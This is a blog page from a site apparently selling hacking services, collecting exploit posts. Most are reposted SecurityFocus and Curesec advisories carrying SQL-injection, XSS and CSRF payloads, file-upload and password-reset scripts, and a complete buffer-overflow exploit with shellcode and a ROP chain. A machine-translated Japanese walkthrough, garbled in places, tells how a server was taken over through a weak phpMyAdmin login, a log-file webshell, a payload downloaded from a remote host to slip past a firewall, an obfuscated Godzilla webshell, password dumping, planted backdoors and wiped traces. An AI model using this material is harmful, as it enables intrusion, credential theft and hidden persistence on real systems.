Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863595181

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/66228/info

GNUboard is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/bbs/ajax.autosave.php?content=1&subject=1[SQLi]
HireHackking 
source: https://www.securityfocus.com/bid/66251/info

OpenX is prone to multiple cross-site request-forgery vulnerabilities.

Exploiting these issues may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.

OpenX 2.8.11 and prior versions are vulnerable. 

File: admin/agency-user-unlink.php
POC: 

<img src='http://site/admin/agency-user-unlink.php?agencyid=1&userid=18' width="1" height="1" border="0">

File: admin/advertiser-delete.php
POC:
<img src='http://site/admin/advertiser-delete.php?clientid=10' width="1" height="1" border="0">

File: admin/banner-delete.php
POC:
<img
src='http://site/admin/banner-delete.php?clientid=2&campaignid=7&bannerid=16'
width="1" height="1" border="0">

File: admin/campaign-delete.php
POC:
<img src='http://site/admin/campaign-delete.php?clientid=2&campaignid=11' width="1" height="1" border="0">

File: admin/channel-delete.php  
POC:
<img
src='http://site/admin/channel-delete.php?affiliateid=1&channelid=6'
width="1" height="1" border="0">

 
File: admin/affiliate-delete.php
POC:
<img
src='http://site/admin/affiliate-delete.php?affiliateid=9' width="1" height="1"
border="0">

 
File: admin/zone-delete.php
POC:
<img
src='http://site/admin/zone-delete.php?affiliateid=1&zoneid=11'
width="1" height="1" border="0">
HireHackking 
source: https://www.securityfocus.com/bid/66149/info

ET - Chat is prone to a security bypass vulnerability.

An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further attacks.

ET - Chat 3.0.7 is vulnerable; other versions may also be affected.

#!/usr/bin/env python
__author__ = 'IRH'
print "Example: et-chat.py http://et-chat.com/chat"

import urllib
import sys

url = sys.argv[1]
url1 = url+"/?InstallIndex"
url2 = url+"/?InstallMake"

checkurl = urllib.urlopen(url1)

if checkurl.code == 200 :
    urllib.urlopen(url2)
    print "Password Was Reseted!! Enjoy ;)"
else:
    print "Site is not Vulnerability"
HireHackking 
source: https://www.securityfocus.com/bid/66108/info

Apple iOS is affected by a security-bypass vulnerability.

Successfully exploiting this issue may allow an attacker to bypass certain security warnings. This may aid in further attacks.

These issues affect Apple iOS versions prior to 7.1.

<iframe src="facetime-audio://user () host com"></iframe>
HireHackking 
source: https://www.securityfocus.com/bid/66100/info

E-Store is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

E-Store 1.0 and 2.0 are vulnerable; other versions may also be affected. 

http://www.example.com/page.php?id=[SQL Injection]

http://www.example.com/news.php?id=[SQL Injection]
HireHackking 
source: www.securityfocus.com/bid/66098/info

QNX Phgrafx is prone to a file-enumeration weakness.

An attacker can exploit this issue to enumerate the files present in the system's root directory; this may aid in further attacks.

QNX 6.5.0 SP1, 6.5.0, 6.4.1, 6.3.0, and 6.2.0 are vulnerable; other versions may also be affected. 

$ id
uid=100(user) gid=100

# directory /root/.ph exists:
$ /usr/photon/bin/phgrafx -d /root/.ph
load_display_conf(): No such file or directory

# file /root/.profile exsts:
$ /usr/photon/bin/phgrafx -d /root/.profile
/root/.profile: opendir(): Not a directory
load_display_conf(): Not a directory

# /root/doesnotexist does not exist:
$ /usr/photon/bin/phgrafx -d /root/doesnotexist
/root/doesnotexist: opendir(): No such file or directory
load_display_conf(): No such file or directory
HireHackking

ターゲットを決定します

1049983-20211227133329750-1797698662.png

情報を収集

x.x.x.x最初に、通常のテスト方法が動揺し、ディレクトリスキャン、ポートスキャン、JSファイル、ミドルウェア、指紋認識があります。

意志でパスを追加し、エラーを報告します。このインターフェースを見ると、すぐに考えがあります。

1049983-20211227133330621-2119695253.png

なぜ私はそれを言うのですか?私はそのようなウェブサイトに遭遇したので、それがエラーを報告したからです。これは、PHPStudyと同じUPUPWと呼ばれるPHP統合環境です。

upupw -pmd

phpstudy-phpmyadmin

ブレークスルーポイント

この統合された環境パッケージには、データベース管理インターフェイスに接続されているphpinfoページもあります

U.PHP 1049983-20211227133331530-711060481.png

弱いパスワードをテストします

ルート/ルート1049983-20211227133332070-251029247.png

接続が成功した後、phpinfoのページを見ることができます

1049983-20211227133332577-1872535075.png

さて、問題はシェルを取得するためにphpmyadminになります

1049983-20211227133333110-1709311843.png

getShell

シェルを取得するための3つのステップ

Global general_log='on'を設定します。

グローバルgeneral_log_file='d:/xxxx/www/cmd.php'を設定します。

'?php assert($ _ post [' cmd ']);'; 3番目のステップが実行されたときにページは実行されます。応答なし。私は瞬時に間違っていると感じ、wafがあるかもしれません

馬を殺さないように変更してみてください、TXTに書いて、成功するかどうかを確認してください

1049983-20211227133333669-199389760.png

問題ありません。PHPファイルを直接書き込むだけです

1049983-20211227133334288-244199575.png

シェルに直接書き込み、接続できます

1049983-20211227133334716-2004556101.png

案の定、WAFがあります。書いていたときに感じました。私はシェルを殺さずにはいられませんでした、そして、SQLステートメントは実行できませんでした。

bypass waf

私は地獄が何であるかわからなかった、ファイルをダウンロードしてみてください

PHPコードWAFのインターセプトを避けるために、ここでリモートでダウンロードしたスクリプトは、JavaScriptを使用してPHPの音訳を使用することです。

グローバルgeneral_log_file='c:/users/administrator/desktop/upupw_ap5_64/htdocs/11.php'を設定します。

'スクリプト言語=' PHP '$ a=' http://x.x.x.x.x.x:81/shell.txt '; $ b=' file '.'_ g'。 /スクリプト '1049983-20211227133335151-847208151.png

11.phpにアクセスすると、shell.phpが生成されます

ここのシェルは、ゴジラのキルフリーシェルも使用しています

?php

session_start();

@set_time_limit(0);

@error_reporting(0);

関数e($ d、$ k){

for($ i=0; $ itrlen($ d); $ i ++){

$ d [$ i]=$ d [$ i]^$ k [$ i+115];

}

$ dを返します。

}

関数Q($ d){

base64_encode($ d)を返します。

}

関数o($ d){

base64_decode($ d)を返します。

}

$ p='pass';

$ v='ペイロード';

$ t='3c6e0b8a9c15224a';

if(isset($ _ post [$ p])){

$ f=o(e(o($ _ post [$ p])、$ t));

if(isset($ _ session [$ v])){

$ l=$ _セッション[$ v];

$ a=Explode( '|'、$ l);

クラスc {public function nvoke($ p){eval($ p。 '');}}

$ r=new C();

$ r-nvoke($ a [0]);

エコーサブスト(MD5($ P. $ T)、0,16);

echo q(e(@run($ f)、$ t));

エコーサブスト(MD5($ P. $ T)、16);

}それ以外{

$ _Session [$ v]=$ f;

}

} 1049983-20211227133335581-974274230.png

何度も試してみてください

1049983-20211227133336029-1700065528.png

1049983-20211227133336441-1129894130.png

プロセスにはWAFプロセスはありません

許可はシステムです

1049983-20211227133336872-903456971.png

散音コード

パスワードをアップロードするツールをアップロードし、管理パスワードを直接取得し、サーバーにログオンします

1049983-20211227133337323-583019201.png

1049983-20211227133337843-704173796.png

1049983-20211227133338235-1688533904.png

バックドアを離れて、トレースをきれいにします

削除されている場合は、もう少し背景を残してください

1049983-20211227133338618-611847887.png

1049983-20211227133339144-1587633202.png

このネットワークセグメントには非常に多くのマシンがあります

1049983-20211227133339619-1138922452.png

ソースコード

ソースコードを開き、WAFが360webscan 1049983-20211227133340154-1963496794.pngであることがわかります

概要:1。情報収集、ディレクトリスキャニング、ポートスキャン、JSファイルに敏感なファイルスキャン、ミドルウェアスキャン、利用可能な情報なしで指紋認識2。この環境では、phpinfoと呼ばれるファイルはu.phpです。弱いパスワードルート/ルートを入力すると、phpmyAdminを直接入力できます。同時に、phpinfoの情報を表示できます。ウェブサイトにさらされた絶対パスはD:/xxxx/www/upupw_apw5_64/htdocs/4.phpmyadmin shellset global general_log='on'を取得します。 '?php assert($ _ post [' cmd ']);'; 5。文を直接記述できますが、シェルに接続してWAF 6によって傍受されます。スクリプトはリモートでダウンロードされましたJavaScriptを使用してPHPバイパスWAF(360WEBSCAN)セットSET SET SET SET SET SET SET SET SET SET/XXXX/WWW/UPUPW_AP5.5_64/HTDOCS/11.PHP '; PHP'; $ a='http://x.x.x.x.x336081/shell.txt'; $ b='file' .'_ g '。' et _ '。 /script'7。 11.phpにアクセスすると、shell.phpshell.txt:php session_start()が生成されます。 @set_time_limit(0); @error_reporting(0);関数E($ d、$ k){for($ i=0; $ istrlen($ d); $ i ++){$ d [$ i]=$ d [$ i]^$ k [$ i+115]; } $ dを返します。 } function q($ d){return base64_encode($ d); } function o($ d){return base64_decode($ d); } $ p='pass'; $ v='ペイロード'; $ t='3c6e0b8a9c15224a'; if(isset($ _ post [$ p])){$ f=o(e($ _ post [$ p])、$ t)); if(isset($ _ session [$ v])){$ l=$ _ session [$ v]; $ a=Explode( '|'、$ l);クラスC {public function nvoke($ p){eval($ p。 '');}} $ r=new C(); $ r-nvoke($ a [0]);エコーサブスト(MD5($ P. $ T)、0,16); echo q(e(@run($ f)、$ t));エコーサブスト(MD5($ P. $ T)、16); } else {$ _session [$ v]=$ f; }} 8。シェルを草から接続してから、プロセスタスクリストを確認します。ウイルス対策ソフトウェアはありません。許可を表示し、システムの許可を表示します9。ハッシュをアップロードしてローカルパスワードをつかみます。ローカルパスワードをつかみます。 11.ソースコードをダウンロードして、WAFで使用されている360Webscanの元のリンクを見つけます:https://xz.aliyun.com/t/9181

HireHackking 
source: https://www.securityfocus.com/bid/66044/info

Premium Gallery Manager plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files.

An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks may also possible. 

<?php
$uploadfile="Sh1Ne.php.jpg";
$ch =
curl_init("http://www.example.com/wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('Filedata'=>"@$uploadfile", 
'folder'=>'/wp-content/plugins/Premium_Gallery_Manager/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult"; 
?>
HireHackking 
source: https://www.securityfocus.com/bid/65969/info

Cory Jobs Search is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Cory Jobs Search 1.0 is vulnerable; other versions may also be affected. 

http://www.example.com/coryapps/jobsearch/admincp/city.php?cid=[MySQL Injection]
HireHackking 
source: https://www.securityfocus.com/bid/65817/info

POSH is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Versions prior to POSH 3.3.0 are vulnerable. 

http://www.example.com/portal/addtoapplication.php?pid=0&rssurl=url,nbvariables,defvar%20FROM%20dir_item,dir_cat_item
%20WHERE%201=0%20UNION%20SELECT%201,2,3,4,5,6,(select%20group_concat(username,':',email,':',md5pass)%20from%20users),8%23
HireHackking 
source: https://www.securityfocus.com/bid/65960/info

Relevanssi plugin for WordPress is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

Versions prior to Relevanssi 3.3 are vulnerable. 

http://www.example.com/wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[SQLi
HireHackking 
source: https://www.securityfocus.com/bid/65744/info

ATutor is prone to multiple cross-site scripting vulnerabilities and a HTML-injection vulnerability.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

ATutor 2.1.1 is vulnerable; other versions may also be affected. 

1. During installation: xss and sql insertion:

---<request>---
POST /k/cms/atutor/ATutor/install/install.php HTTP/1.1
Host: www.example.com
(...)
Content-Length: 191

action=process&step=2&new_version=2.1.1&db_host=localhost&db_port=3306&db_login=root&db_password=superpass&db_name='%3e"%3e%3cscript%3ealert(1)%3c%2fscript%3e&tb_prefix=AT_&submit=Next+%BB+
---<request>---


---<response>---
<ul><li>Database <b>\'>\"><script>alert(1)</script></b> created successfully.
---<response>---

--> tb_prefix and new_version parameter are also vulnerable.


# ==============================================================
# 2. XSS

---<request>---
POST /k/cms/atutor/ATutor/install/install.php HTTP/1.1
Host: www.example.com
(...)
Content-Length: 667

action=process&form_admin_password_hidden=5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8&form_account_password_hidden=5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8&step=3&step2%5Bnew_version%5D='%3e"%3e%3cscript%3ealert(1)%3c%2fscript%3e&step2%5Bdb_host%5D=localhost&step2%5Bdb_port%5D=3306&step2%5Bdb_login%5D=root&step2%5Bdb_password%5D=superpass&step2%5Bdb_name%5D=atutor&step2%5Btb_prefix%5D=AT_&smtp=false&admin_username=admin&admin_password=&admin_email=admin%40here.com&site_name=Course+Server&email=admin%40here.com&just_social=0&home_url=&account_username=admin&account_password=&account_email=admin%40here.com&account_fname=admin&account_lname=admin&submit=+Next+%BB

---<request>---

Vulnerable to XSS are also parameters:
step2%5Bnew_version%5D
step2%5Bdb_host%5D
step2%5Bdb_port%5D
step2%5Bdb_login%5D
step2%5Bdb_password%5D
step2%5Bdb_name%5D
step2%5Btb_prefix%5D


# ==============================================================
# 3. Persistent XSS (from admin)

---<request>---
POST /k/cms/atutor/ATutor/mods/_standard/forums/admin/forum_add.php HTTP/1.1
Host: www.example.com
(...)
Content-Length: 108

add_forum=true&title='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&description=aaaaaaaaaaaaaa&edit=0&submit=Save
---<request>---

---<response>---
<span class="required" title="Required Field">*</span><label
for="title">Title</label><br />
    <input type="text" name="title" size="40" id="title"
value="'>"><body/onload=alert(9999)>" />
  </div>
---<response>---



# ==============================================================
# 4. Edit config (from admin user):

---<request>---
POST /k/cms/atutor/ATutor/admin/config_edit.php HTTP/1.1
Host: www.example.com
(...)
Content-Length: 946

site_name='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&home_url=http%3A%2F%2Fwww.atutorspaces.com&default_language=en&contact_email=admin%40here.com&time_zone=0&session_timeout=20&max_file_size=10485760&max_course_size=104857600&max_course_float=2097152&max_login=5&display_name_format=1&master_list=0&allow_registration=1&allow_browse=1&show_current=1&allow_instructor_registration=1&use_captcha=0&allow_unenroll=1&email_confirmation=0&allow_instructor_requests=1&disable_create=0&email_notification=1&auto_approve_instructors=0&theme_categories=0&user_notes=0&illegal_extentions=exe+asp+php+php3+bat+cgi+pl+com+vbs+reg+pcd+pif+scr+bas+inf+vb+vbe+wsc+wsf+wsh&cache_dir=&cache_life=7200&latex_server=http%3A%2F%2Fwww.atutor.ca%2Fcgi%2Fmimetex.cgi%3F&course_backups=5&sent_msgs_ttl=120&check_version=0&fs_versioning=1&old_enable_mail_queue=0&enable_mail_queue=0&auto_install_languages=0&pretty_url=0&course_dir_name=0&apache_mod_rewrite=0&submit=Save
---<request>---
HireHackking 
source: https://www.securityfocus.com/bid/65740/info

eshtery CMS is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.

Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks. 

 http://www.example.com/[path]/FileManager.aspx?file=E:\web\admin.asp
HireHackking 
source: https://www.securityfocus.com/bid/65685/info

VideoCharge Studio is prone to a remote stack-based buffer-overflow vulnerability because the software fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.

Successful exploits allow remote attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts likely result in denial-of-service conditions.

VideoCharge Studio 2.12.3.685 is vulnerable; other versions may also be affected. 

#!/usr/bin/python
# Exploit Title: VideoCharge Studio v2.12.3.685 cc.dll GetHttpResponse() 
MITM Remote Code Execution Exploit (SafeSEH/ASLR/DEP Bypass)
# Version:       v2.12.3.685
# Date:          2014-02-18
# Author:        Julien Ahrens (@MrTuxracer)
# Homepage:      http://www.rcesecurity.com
# Software Link: http://www.videocharge.com
# Tested on:     Win7-GER (DEP enabled)
#
# Howto / Notes:
# Since it's a MITM RCE you need to spoof the DNS Record for 
www.videocharge.com in order to successfully exploit this vulnerability
#
 
from socket import *
from struct import pack
from time import sleep
 
host = "192.168.0.1"
port = 80
 
s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print "\n[+] Listening on %d ..." % port
 
cl, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]
 
# Thanks Giuseppe D'Amore for the amazing shellcode
# http://www.exploit-db.com/exploits/28996/
shellcode = 
("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"+
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"+
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"+
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"+
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"+
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"+
"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"+
"\x49\x0b\x31\xc0\x51\x50\xff\xd7")
 
junk0 = "\x90" * 1277
junk1 = "\x90" * 1900
nops="\x90" * 30
jmpesp=pack('<L',0x102340e8) * 5 # jmp esp |  {PAGE_EXECUTE_READ} 
[cc.dll]
 
# jump to controlled memory
eip=pack('<L',0x61b84af1) # {pivot 4124 / 0x101c} # ADD ESP,101C # RETN 
[zlib1.dll]
 
#
# ROP registers structure:
# EBP - VirtualProtect() call
# ESP - lpAddress
# EBX - dwSize
# EDX - flNewProtect
# ECX - lpflOldProtect
#
 
# Craft VirtualProtect() call (0x0080D816) via [DE2D66F9 XOR DEADBEEF] 
and MOV to EBP
rop = pack('<L',0x101ff01d) # XCHG EAX,ECX # RETN [cc.dll]
rop += pack('<L',0x61b849b6) # POP EDI # RETN [zlib1.dll]
rop += pack('<L',0xDE2D66F9) # XOR param 1
rop += pack('<L',0x10206ac5) # POP EBX # RETN [cc.dll]
rop += pack('<L',0xDEADBEEF) # XOR param 2
rop += pack('<L',0x1002fb27) # XOR EDI,EBX # ADD DL,BYTE PTR DS:[EAX] # 
RETN [cc.dll]
rop += pack('<L',0x101f7572) # MOV EAX,EDI # POP EDI # RETN [cc.dll] 
rop += pack('<L',0xDEADBEEF) # Filler
rop += pack('<L',0x101fbc62) # XCHG EAX,EBP # RETN [cc.dll]
 
# Craft VirtualProtect() dwSize in EAX and MOV to EBX
rop += pack('<L',0x101e66a0) # XOR EAX,EAX # RETN [cc.dll]
rop += pack('<L',0x101f2adc) # ADD EAX,500 # RETN [cc.dll]
rop += pack('<L',0x1023ccfb) # XCHG EAX,EBX # RETN [cc.dll]
 
# Craft VirtualProtect() flNewProtect in EAX and MOV to EDX
rop += pack('<L',0x101e66a0) # XOR EAX,EAX # RETN [cc.dll]
rop += pack('<L',0x102026a1) # ADD EAX,25 # RETN [cc.dll]
rop += pack('<L',0x102155aa) # ADD EAX,0C # RETN [cc.dll]
rop += pack('<L',0x102155aa) # ADD EAX,0C # RETN [cc.dll]
rop += pack('<L',0x102026b1) # ADD EAX,3 # RETN [cc.dll]
rop += pack('<L',0x101ff01d) # XCHG EAX,ECX # RETN [cc.dll]
rop += pack('<L',0x61b90402) # MOV EDX,ECX # RETN [zlib1.dll]
 
# Put writable offset for VirtualProtect() lpflOldProtect to ECX
rop += pack('<L',0x1020aacf) # POP ECX # RETN [cc.dll]
rop += pack('<L',0x61B96180) # writable location [zlib1.dll]
 
# POP a value from the stack after PUSHAD and POP value to ESI
# as a preparation for the VirtualProtect() call
rop += pack('<L',0x61b850a4) # POP ESI # RETN [zlib1.dll]
rop += pack('<L',0x61B96180) # writable location from [zlib1.dll]
rop += pack('<L',0x61b849b6) # POP EDI # RETN [zlib1.dll]
rop += pack('<L',0x61b849b6) # POP EDI # RETN [zlib1.dll]
 
# Achievement unlocked: PUSHAD
rop += pack('<L',0x101e93d6) # PUSHAD # RETN [cc.dll]
rop += pack('<L',0x102340c5) # jmp esp |  {PAGE_EXECUTE_READ} [cc.dll]
 
payload = junk0 + eip + junk1 + rop + jmpesp + nops + shellcode
 
buffer = "HTTP/1.1 200 OK\r\n"
buffer += "Date: Sat, 09 Feb 2014 13:33:37 GMT\r\n"
buffer += "Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with 
Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g\r\n"
buffer += "X-Powered-By: PHP/5.2.6-1+lenny16\r\n"
buffer += "Vary: Accept-Encoding\r\n"
buffer += "Content-Length: 4000\r\n"
buffer += "Connection: close\r\n"
buffer += "Content-Type: text/html\r\n\r\n"
buffer += payload
buffer += "\r\n"
 
print cl.recv(1000)
 
cl.send(buffer)
 
print "[+] Sending exploit: OK\n"
 
sleep(3)
cl.close()
s.close()
HireHackking 
source: https://www.securityfocus.com/bid/65438/info

Projoom NovaSFH plugin for Joomla! is prone to an arbitrary-file-upload vulnerability because it fails to adequately sanitize user-supplied input.

An attacker may leverage this issue to upload arbitrary files; this can result in arbitrary code execution within the context of the vulnerable application.

Projoom NovaSFH Plugin 3.0.2 is vulnerable; other versions may also be affected. 

POST /administrator/components/com_novasfh/views/upload.php?action=upload&dest=L3Zhci93d3cvaHRtbA== HTTP/1.1
Host: <IP>
Proxy-Connection: keep-alive
Content-Length: 513
Origin: <originl>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36
Content-Type: multipart/form-data; boundary=----------ae0cH2Ij5ei4ei4Ef1Ij5Ij5ae0cH2
Accept: */*
DNT: 1
Referer: http://<host>/administrator/index.php?option=com_novasfh&c=uploader
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8

------------ae0cH2Ij5ei4ei4Ef1Ij5Ij5ae0cH2
Content-Disposition: form-data; name="Filename" 

php_backdoor.php
------------ae0cH2Ij5ei4ei4Ef1Ij5Ij5ae0cH2
Content-Disposition: form-data; name="Filedata"; filename="php_backdoor3.php" 
Content-Type: application/octet-stream

[PHP_CODE]

------------ae0cH2Ij5ei4ei4Ef1Ij5Ij5ae0cH2
Content-Disposition: form-data; name="Upload" 

Submit Query
------------ae0cH2Ij5ei4ei4Ef1Ij5Ij5ae0cH2--
HireHackking 
source: https://www.securityfocus.com/bid/65675/info

Catia is prone to a stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary-checks on user-supplied input.

An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.

Catia V5-6R2013 is vulnerable. 

#!/usr/bin/env python
   
import socket
import struct
import ctypes
 
RetAdd="\x90\x90\x90\x90"
Shell="S" *1000
buff= "\x00\x01\x00\x30" + "A" * 20 + "AppToBusInitMsg" +"\x00" + "\x00" * 48 + "CATV5_Backbone_Bus" +"\x00" + "\x00"* 49 + "\x00\x00\x00\x00"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.3", 55555))
#s.connect(("192.168.0.5", 55558))
s.send(struct.pack('>I',len(buff) ))
s.send(buff)
buff= "\x02\x00\x00\x00" + RetAdd*3 + "\x00\x00\x00\x00" * 13 + "\x00\x00\x00\x00" * 5 + "CATV5_AllApplications" +"\x00" + "\x00"* 43 +"\x00\x00\x98" + "\x00\x00\x00\x01" +"\x00"*4 +"\x08\x00\x00\x00" + Shell                                   
s.send(struct.pack('>I',len(buff) ))
s.send(buff)
HireHackking 
source: https://www.securityfocus.com/bid/65420/info

Singapore Image Gallery is prone to a remote file-include vulnerability and a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker can exploit these vulnerabilities to obtain potentially sensitive information, execute arbitrary script code in the context of the web server process, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site or steal cookie-based authentication credentials and launch other attacks.

Singapore 0.9.9b and 0.9.10 are vulnerable; other versions may also be vulnerable. 

http://www.example.com/thumb.php?gallery=./00000000000-764&height=100&image=[File Upload]
HireHackking 
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    PhpSocial v2.0.0304_20222226
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Webite:       http://phpsocial.net
Vulnerability Type:  CSRF
Remote Exploitable:  Yes
Reported to vendor:  11/21/2015
Disclosed to public: 12/21/2015
Release mode:        Full Disclosure
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Overview

CVSS

Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P

Description

PhpSocial is a social networking software written in PHP. In version v2.0.0304,
it does not have CSRF protection, which means that an attacker can perform
actions for a victim, if the victim visits an attacker controlled site while
logged in.

3. Proof of Concept

Add a new admin:


<html>
  <body>
    <form action="http://localhost/PhpSocial_v2.0.0304_20222226/cms_phpsocial/admin/AdminAddViewadmins.php" method="POST">
      <input type="hidden" name="admin_username" value="admin2" />
      <input type="hidden" name="admin_password" value="admin" />
      <input type="hidden" name="admin_password_confirm" value="admin" />
      <input type="hidden" name="admin_name" value="admin2" />
      <input type="hidden" name="admin_email" value="admin2@example.com" />
      <input type="hidden" name="task" value="addadmin" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

11/21/ Contacted Vendor (no reply)
2015
12/10/ Tried to remind vendor (no email is given, security@phpsocial.net does
2015   not exist, and contact form could not be used because the website is
       down)
12/21/ Disclosed to public
2015


Blog Reference:
https://blog.curesec.com/article/blog/PhpSocial-v200304-CSRF-133.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany
HireHackking 
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Arastta 1.1.5
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Website:      http://arastta.org/
Vulnerability Type:  SQL Injection
Remote Exploitable:  Yes
Reported to vendor:  11/21/2015
Disclosed to public: 12/21/2015
Release mode:        Full Disclosure
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Overview

Arastta is an eCommerce software written in PHP. In version 1.1.5, it is
vulnerable to two SQL injection vulnerabilities, one normal injection when
searching for products via tags, and one blind injection via the language
setting. Both of them require a user with special privileges to trigger.

3. SQL Injection 1

CVSS

Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description

There is an SQL Injection when retrieving products.

Currently, only the "filter" variable is vulnerable. Note that the "tag_name"
variable would also be vulnerable to SQL injection, if there wasn't a filter
that forbid single quotes in the URL. As defense in depth, it might be a good
idea to sanitize that value here as well.

Note that an account with the right "Catalog -> Filters" is needed to exploit
this issue.

Proof of Concept


POST /Arastta/admin/index.php?route=catalog/product/autocomplete&token=3d6cfa8f9f602a4f47e0dfbdb989a469&filter_name=a&tag_name= HTTP/1.1

tag_text[][value]=abc') union all select password from gv4_user -- -

Code


/admin/model/catalog/product.php
public function getTags($tag_name, $filter_tags = null) {
    [...]
    $query = $this->db->query("SELECT DISTINCT(tag) FROM `" . DB_PREFIX . "product_description` WHERE `tag` LIKE '%" . $tag_name . "%'" . $filter);

/admin/controller/catalog/product.php
            public function autocomplete() {
    [...]
    if (isset($this->request->get['tag_name'])) {

$this->load->model('catalog/product');

if (isset($this->request->get['tag_name'])) {
    $tag_name = $this->request->get['tag_name'];
} else {
    $tag_name = '';
}

$filter = null;

if(isset($this->request->post['tag_text'])) {
    $filter = $this->request->post['tag_text'];
}

$results = $this->model_catalog_product->getTags($tag_name, $filter);

foreach ($results as $result) {
    $json[] = array(
'tag' => $result,
'tag_id' => $result
    );
}
    }

4. SQL Injection 2

CVSS

Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description

There is a second order timing based SQL injection when choosing the language
setting.

An admin account with the right "Setting -> Setting" is needed to exploit this
issue.

Alternatively, a user with the right "Localisation -> Languages" can inject a
payload as well. However, a user with the right "Setting -> Setting" is still
needed to choose the malicious language to trigger the payload.

Proof of Concept


Visit the setting page:
http://localhost/Arastta/admin/index.php?route=setting/setting

For the config_language and config_admin_language parameters use:
en' AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null) -- -

Visiting any site will trigger the injected code.

Code


/Arastta/system/library/utility.php
public function getDefaultLanguage(){
    if (!is_object($this->config)) {
return;
    }

    $store_id = $this->config->get('config_store_id');

    if (Client::isAdmin()){
$sql = "SELECT * FROM " . DB_PREFIX . "setting WHERE `key` = 'config_admin_language' AND `store_id` = '" . $store_id . "'";
    } else {
$sql = "SELECT * FROM " . DB_PREFIX . "setting WHERE `key` = 'config_language' AND `store_id` = '" . $store_id . "'";
    }
    $query = $this->db->query($sql);
    $code = $query->row['value'];

    $language = $this->db->query("SELECT * FROM " . DB_PREFIX . "language WHERE `code` = '" . $code . "'");

    return $language->row;
}

5. Solution

This issue was not fixed by the vendor.

6. Report Timeline

11/21/2015 Informed Vendor about Issue (no reply)
